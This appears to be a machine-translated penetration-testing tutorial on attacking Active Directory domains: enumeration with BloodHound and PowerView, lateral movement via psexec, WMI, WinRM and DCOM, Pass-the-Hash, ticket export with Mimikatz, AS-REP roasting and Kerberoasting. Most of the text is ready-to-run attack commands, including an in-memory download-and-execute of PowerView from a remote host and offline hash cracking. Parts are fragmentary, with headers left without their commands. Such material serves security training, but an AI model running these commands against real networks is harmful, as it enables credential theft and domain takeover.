Domain Penetration Basics—AD Domain Environment Attacks and Lateral Movement

# 查看域信息[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() # 获取域控制器列表nltest /dclist:lab.local # 查看域信任关系nltest /domain_trusts # 基本域信息net group "Domain Admins" /domainnet group "Domain Controllers" /domain

# 查看 OU 结构Get-ADOrganizationalUnit -Filter * | Select-Object Name, DistinguishedName # View all GPOs # View detailed settings for a GPO ### Key AD objects | Object Type | Description | Penetration Testing Focus ||----------|------|---------------|| User accounts | Domain users | Weak passwords, SPN settings, privileged group membership || Computer Accounts | Domain Machines | Unconstrained Delegation || Service Account | The account under which the service is running | Kerberoasting Targets || Groups | Security Groups/Distribution Groups | Domain Admins, Enterprise Admins || GPO | Group Policy Object | Password Policy, Script Execution | ## Domain environment information collection ### BloodHound BloodHound is the most powerful information collection and attack path analysis tool for domain penetration. It uses a graph database to visually display the authority relationships within the domain. ```bash# 安装 BloodHound# 方法一：apt 安装sudo apt install bloodhound neo4j # 方法二：Docker 安装（推荐 BloodHound CE 社区版）curl -L https://ghst.ly/getbhce | docker compose -f - up # 启动 Neo4j 数据库sudo neo4j console# 默认访问 http://localhost:7474 修改密码 # 启动 BloodHound GUIbloodhound

# 在域内机器上运行 SharpHound 收集器# 收集所有信息.\SharpHound.exe -c All # Specify domain and collection method # Use the PowerShell version # Remote collection (from Linux attack machine) using bloodhound-python #### BloodHound attack path analysis After importing data in BloodHound, attack paths can be discovered using built-in queries: - **Find Shortest Paths to Domain Admins** — Find the shortest attack paths to domain administrators ### PowerView PowerView is the AD enumeration module in the PowerSploit framework and provides a large number of domain information collection commands. ```powershell# 导入 PowerViewImport-Module .\PowerView.ps1# 或使用内存加载IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.5/PowerView.ps1') # 域基本信息Get-DomainGet-DomainControllerGet-DomainPolicy # 用户枚举Get-DomainUser | Select-Object samaccountname, description, memberofGet-DomainUser -SPN  # 查找设置了 SPN 的用户（Kerberoasting 目标）Get-DomainUser -AdminCount  # 查找管理员账户 # 组枚举Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty memberGet-DomainGroupMember -Identity "Domain Admins" -Recurse # 计算机枚举Get-DomainComputer | Select-Object name, operatingsystem, dnshostnameGet-DomainComputer -Unconstrained  # 查找不受约束的委派 # 共享枚举Find-DomainShare -CheckShareAccess # 查找当前用户有本地管理员权限的机器Find-LocalAdminAccess # GPO 枚举Get-DomainGPO | Select-Object displayname, gpcfilesyspath

用户  ──AS-REQ(用户Hash加密时间戳)──>  KDC(域控)用户  <──AS-REP(TGT, 用krbtgt Hash加密)──  KDC用户  ──TGS-REQ(TGT)──>  KDC用户  <──TGS-REP(ST, 用服务Hash加密)──  KDC用户  ──AP-REQ(ST)──>  目标服务

# impacket-psexec（推荐，支持 Pass-the-Hash）impacket-psexec lab.local/administrator:'P@ssw0rd!'@10.10.10.101 # 使用 NTLM Hashimpacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 lab.local/administrator@10.10.10.101 # Sysinternals PsExecPsExec.exe \\10.10.10.101 -u lab\administrator -p P@ssw0rd! cmd.exe # CrackMapExec 批量执行crackmapexec smb 10.10.10.0/24 -u administrator -p 'P@ssw0rd!' --exec-method smbexec -x "whoami"

# impacket-wmiexecimpacket-wmiexec lab.local/administrator:'P@ssw0rd!'@10.10.10.101 # Use Hash # PowerShell WMI remote commands ### WinRM lateral movement ```powershell# PowerShell RemotingEnter-PSSession -ComputerName SRV01 -Credential lab\administratorInvoke-Command -ComputerName SRV01 -ScriptBlock { whoami; hostname } -Credential lab\administrator # evil-winrmevil-winrm -i 10.10.10.101 -u administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0'

# impacket-dcomexecimpacket-dcomexec lab.local/administrator:'P@ssw0rd!'@10.10.10.101 # PowerShell DCOM ### Lateral movement tools comparison | Method | Required Ports | Required Permissions | Obscurity | Log Traces ||------|---------|-----------|--------|---------|| PsExec | 445 (SMB) | Local Administrator | Low | Service Creation Event || WMI | 135+ dynamic ports | Local Administrator | Medium | WMI Events || WinRM | 5985/5986 | Remote Management Permissions | Medium | PowerShell Logs || DCOM | 135 + dynamic ports | Local Admin | High | Less || RDP | 3389 | RDP User Group | Low | Login Events | ## Pass-the-Hash（PTH） Pass-the-Hash allows an attacker to authenticate using a user's NTLM hash instead of a clear text password and is one of the most commonly used techniques in domain penetration. ```bash# CrackMapExec PTHcrackmapexec smb 10.10.10.0/24 -u administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0' --local-auth # impacket 工具集 PTHimpacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 administrator@10.10.10.101impacket-wmiexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 administrator@10.10.10.101impacket-smbexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 administrator@10.10.10.101 # evil-winrm PTHevil-winrm -i 10.10.10.101 -u administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0' # xfreerdp PTH（RDP Pass-the-Hash，需要 Restricted Admin 模式启用）xfreerdp /v:10.10.10.101 /u:administrator /pth:31d6cfe0d16ae931b73c59d7e0c089c0

# 使用 Mimikatz 导出当前会话的票据mimikatz # sekurlsa::tickets /export # View exported tickets # Inject the ticket into the current session # Using Rubeus for PTT # Verify that the ticket has been injected # The target resource can now be accessed directly ## AS-REP Roasting When the "Do not require Kerberos preauthentication" option is enabled for a domain user, an attacker without knowing the password can obtain the user's AS-REP response, which contains encrypted data that can be cracked offline. ```bash# 使用 impacket 获取 AS-REP Hashimpacket-GetNPUsers lab.local/ -usersfile users.txt -dc-ip 10.10.10.100 -format hashcat -outputfile asrep_hashes.txt # 使用已知凭据枚举并获取impacket-GetNPUsers lab.local/testuser:'Welcome1!' -dc-ip 10.10.10.100 -request # 使用 Rubeus（在域内机器上）.\Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt

# PowerView 查找不要求预认证的用户Get-DomainUser -PreauthNotRequired | Select-Object samaccountname

# 使用 Hashcat 破解 AS-REP Hashhashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt # 使用 John the Ripperjohn asrep_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

# 使用 impacket-GetUserSPNsimpacket-GetUserSPNs lab.local/testuser:'Welcome1!' -dc-ip 10.10.10.100 -request -outputfile kerberoast_hashes.txt # Use Rubeus # Target specific users ```powershell# PowerView 查找 Kerberoastable 用户Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname # 使用 PowerShell 原生方法请求 TGSAdd-Type -AssemblyName System.IdentityModelNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/srv01.lab.local:1433"

# Hashcat 破解 Kerberoast Hashhashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt # John the Ripper ## Security recommendations and defensive measures 1. **Strong Password Policy** — Use strong passwords of 25+ characters for service accounts, and domain administrator passwords are rotated regularly ## Summarize Domain penetration is an advanced stage of Windows penetration testing and a core part of enterprise network security assessment. This article covers key techniques for domain penetration: - **Information Collection** — BloodHound and PowerView are core tools for domain environment analysis In actual domain penetration, the attack chain usually follows the "information collection → obtaining initial credentials → lateral movement → elevating privileges to domain administrators". BloodHound’s attack path analysis can significantly improve the efficiency of this process. The next article will delve into the post-exploitation phase of Windows and explain the Mimikatz password extraction and ticket attack techniques.